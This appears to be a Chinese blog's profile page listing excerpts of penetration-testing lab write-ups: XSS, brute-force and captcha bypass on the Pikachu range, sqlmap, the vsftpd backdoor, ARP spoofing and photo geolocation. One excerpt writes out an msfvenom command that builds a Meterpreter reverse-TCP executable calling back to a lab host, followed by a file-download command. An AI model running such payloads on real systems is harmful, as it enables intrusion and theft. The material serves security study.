自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 Pikachu-XSS演示和原理分析

3.看一下源码,可以看到这里有一段javascript的代码,首先他用dom里面的getElementById这个方法去获取id等于text这么一个标签的值,这个text实际上就是这个input是我们输入的内容,它把我们输入的内容赋值给str,然后又把我们输入的内容通过字符串拼接的方式写到了a标签中的href属性里面。4.根据刚才的思路,我们看一下页面的源码,ctrl+f 搜素刚才的字符,我们输入的这个字符被输出到了这个HTML p标签的源码里面,并没有进行任何处理。

2023-01-06 20:31:24 260 1

原创 XSS基本概念和原理介绍

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致 "精心构造" 的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。● XSS漏洞一直被评估为Web漏洞中危害较大的漏洞,在OWASP TOP的排名中一直属于前三的江湖地位。④提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;交换的数据一般不会被保存在数据库里面,一次性,所见即所得,一般出现在查询类页面等。交换的数据会被保存在数据库里面,永久性存储,一般出现在留言板,注册等页面。

2023-01-02 21:55:17 1373

原创 Pikachu-token防爆破?

2. 使用Burp Suite抓包,可以看到请求头中有token参数,重放两次数据后会提示token有误,则说明每个数据包的token都会变化。选中token值,这个时候工具会自动编辑规则,复制token值备用,点击ok。查看源码我们就能发现,token的值输出在了前端源码上,容易被获取,因此也就失去了防爆破的意义。②对认证错误的提交进行计数并给出限制,比如连续5次密码错误,锁定2小时。3.选择pitchfork进行爆破,添加账号、密码、token为变量。③必要的情况下,使用双因素认证。

2022-12-27 15:35:19 1220

原创 Pikachu-暴力破解验证码绕过

3.由于验证码每次会变,我们无法从验证码这块进行暴力破解,回到页面,看一下这个页面的源码,看一下这个验证码是不是在前端做的,发现验证码是在javascript实现的。2. 随便输入账号密码,不输入验证码,提示请输入验证码,输入错误验证码,提示验证码输入错误,看来一定要这个验证码才能过这一步,输入正确验证码,提示账号密码错误。5. 不输入验证码或输错验证码,均输出账号密码错误,并没有说验证码错误,则后台并没有验证这个验证码。4. 输入错误的验证码,提示说验证码输入错误。

2022-12-27 14:09:52 2381

原创 Pikachu-基于表单的暴力破解

暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。

2022-12-27 11:46:34 927

原创 Pikachu(皮卡丘)靶场搭建

Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。

2022-12-26 21:07:57 4763

原创 用链表表示多项式,并实现多项式的加法运算

输入在第一行给出第一个多项式POLYA的系数和指数,并以0,0 结束第一个多项式的输入;在第二行出第一个多项式POLYB的系数和指数,并以0,0 结束第一个多项式的输入。对每一组输入,在一行中输出POLYA+POLYB和多项式的系数和指数。输出样例:本题主要思路;1.建立两个头指针分别为head1和head2链表,链表每一个节点分别记录每一个多项式的系数coef和指数exp.2.preA遍历链表head1,preB遍历链表head2.3.建立一个只有一个头节点的链表head,逐步遍历链表he

2022-12-05 21:07:40 1368

原创 移动链表中的最大值到尾部

本题的思路为:先通过一次遍历找到最大值,然后第二次的遍历过程中将最大值的结点移动到尾部。在进行移动中先判断最大值是否在尾部,如果在尾部,则不需要进行操作。 测试结果如下

2022-12-05 21:01:57 1810

原创 链表的插入算法

本题要求实现一个插入函数,实现在链表llist中的元素x之后插入一个元素y的操作。int InsertPost_link(LinkList llist, DataType x, DataType y);其中 llist是操作的链表,x是待插入元素y的前驱节点元素,y是待插入的元素裁判测试程序样例:插入代码如下: 在链表插入需要考虑三种情况:头部插入,中间插入,尾部插入。头部插入的时候需要移动头结点;中间插入需要注意新建的结点要先连接后面,再连接前面的;尾部插入的时候直接连接到前面的结点就行。

2022-12-05 20:54:57 832

原创 网络渗透测试实验四 CTF实践

还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。80端口:80端口是为HTTP(HyperText Transport Protocol,超文本传输协议)开放的,这是上网冲浪使用最多的协议,主要用于在WWW(World Wide Web,万维网)服务上传输信息的协议。-z [command] 运行指定的命令。

2022-11-22 17:27:40 376

原创 网络渗透测试实验三 XSS和SQL注入

你输入的命令:sqlmap -u "http://192.168.131.129/dvwa/vulnerabilities/sqli/?你输入的命令:sqlmap -u "http://192.168.131.129/dvwa/vulnerabilities/sqli/?你输入的命令:sqlmap -u "http://192.168.131.129/dvwa/vulnerabilities/sqli/?

2022-11-22 16:53:09 181

原创 网络渗透测试实验二 网络嗅探与身份认证

①不浏览不安全网址。John the Ripper免费的开源软件,是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。2.研究交换环境下的网络嗅探实现及防范方法,研究ARP协议存在的安全漏洞,了解ARP欺骗攻击的原理。

2022-11-21 15:16:34 122

原创 Bugku CTF 你以为是MD5吗

MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。MD5由美国密码学家罗纳德·李维斯特(Ronald Linn Rivest)设计,于1992年公开,用以取代MD4算法。这套算法的程序在 RFC 1321 标准中被加以规范。1996年后该算法被证实存在弱点,可以被加以破解,对于需要高度安全性的数据,专家一般建议改用其他算法,如SHA-2。

2022-11-16 22:01:36 228

原创 Metasploit应用

使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.131.128 lport=5000 -f exe -o /var/payload.exe。接下来输入命令:download C:\\hh.txt /home/ 下载hh.txt文件到home文件夹里。lhost的值为Kali的ip,保存的位置为:/var/payload.exe。结果在home文件夹中找到hh.txt。在var文件目录下找到payload.exe。

2022-11-05 21:11:05 686

原创 漏洞渗透测试:easy file sharing server

扫描对应端口服务的版本信息,发现8000端口的版本信息为easy file sharing server httpd 6.9。因为靶机上有IIS可能占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart。用python运行这个脚本,运行成功。转到靶机上,发现软件自动关闭并打开了计算器,漏洞复现完毕。利用该漏洞,在Kali终端输入searchsploit命令,查找渗透模块。靶机:windows(这里我使用的是win7)一路next即可,点击try it!

2022-11-05 14:53:25 912

原创 ARP欺骗

如果不存在,则向本网络上每一个主机广播一个ARP请求报文,其意义是"如果你有此IP地址,请告诉我你的MAC地址",目的主机收到此请求包后,发送一个ARP响应报文,本机收到此响应后,把相关信息记录在ARP高速缓存中,以下的步骤同上。那么被欺骗主机的ARP高速缓存,被假冒者的IP地址与其MAC地址的对应关系就会更改为欺骗者的,从而达到ARP欺骗的目的。特别的,如果攻击者冒充网关,将转发子网内到外网的所有通信量,以达到捕获其他主机的通信量,从而破坏数据传输的保密性。接下来打开arp转发命令,进行arp欺骗。

2022-11-05 14:38:55 5668 4

原创 网络渗透测试实验一 网络扫描与网络侦察

通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。同时,该病毒还会在被感染电脑中留下后门病毒,以准备进行后续的恶意攻击,不排除未来会向用户电脑传播更具威胁性病毒的可能性,例如勒索病毒等。4、由于数据可以恢复,所以不用的电子产品别轻易换盆,可能导致个人隐私泄露,可以打开录屏,将内存占满,把原来的覆盖掉,或者恢复出厂设置(不要选择保留数据的那种)。

2022-10-31 12:29:14 181

原创 笑脸漏洞的复现

在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以连接,并且VSFTPD v2.3.4服务,是以root权限运行的,最终获取到的权限也是root。2.开启metasploitable-linux-2.0.0虚拟机,在Kali上打开一个终端,使用Kali的nmap对靶机进行端口扫描,观察靶机上的服务开放情况。注意:此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会关闭。1.查看本机ip,打开Kali主机终端,执行ifconfig。

2022-10-21 18:28:55 1389

原创 通过一张模糊的照片,判断拍摄的具体位置

这是在网上找到的一张图片,首先这张图片给我们的第一印象就是非常模糊,除了玻璃上的雨水,其他几乎完全看不清,但是这雨水正是我们的突破点,除了雨点,我们还能发现一个重要信息,右下角有拍摄时间,是2021.11.7 17:44。放大图片后我们可以观察到,马路边的这家店铺还有一些字可以识别出,比如前面三个字母大概率是FUX,后面两个是NG,中间被挡住了,我们先百度搜索一下这个字母FUX*NG。而仔细观察会发现,11月份,北方这些地区基本都是雨夹雪,可能不是很符合我们的条件,所以我们暂时排除,先从广东开始排查。

2022-10-13 22:43:15 466 3

原创 不同模式下物理机和kali虚拟机IP地址的关系

VMware桥接模式,也就是将虚拟机的虚拟网络适配器与主机的物理网络适配器进行交接,虚拟机中的虚拟网络适配器可通过主机中的物理网络适配器直接访问到外部网络。简而言之,这就好像在局域网中添加了一台新的、独立的计算机一样。如果你想把虚拟机当做一台完全独立的计算机看待,并且允许它和其他终端一样的进行网络通信,那么桥接模式通常是虚拟机访问网络的最简单途径。路由器的ip为192.168.10.1的话,主机和虚拟机分配的ip将不会是192.168.10.xxx ,会变为其他的192.168.xxx.xxx。

2022-10-07 22:36:21 690 1

原创 通过wirshark抓包处理TCP流并还原文件

选择手机到pc的对话,数据选择原始数据,因为发送的图片,所以后缀为.jpg,名字随便取,保存到桌面。打开wireshark,在过滤器中输入ip.src==你手机的ip地址。用手机QQ给pc传输文件。jpg格式的文件头为FFD8FF,找到这个,把前面多余的删除,保存。然后打开WinHex,在桌面找到.jpg这个文件打开。首先,我们先讲手机和pc连接同一个子网,登录QQ。然后右键点击追踪流,选择TCP流。

2022-10-07 21:46:44 818

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除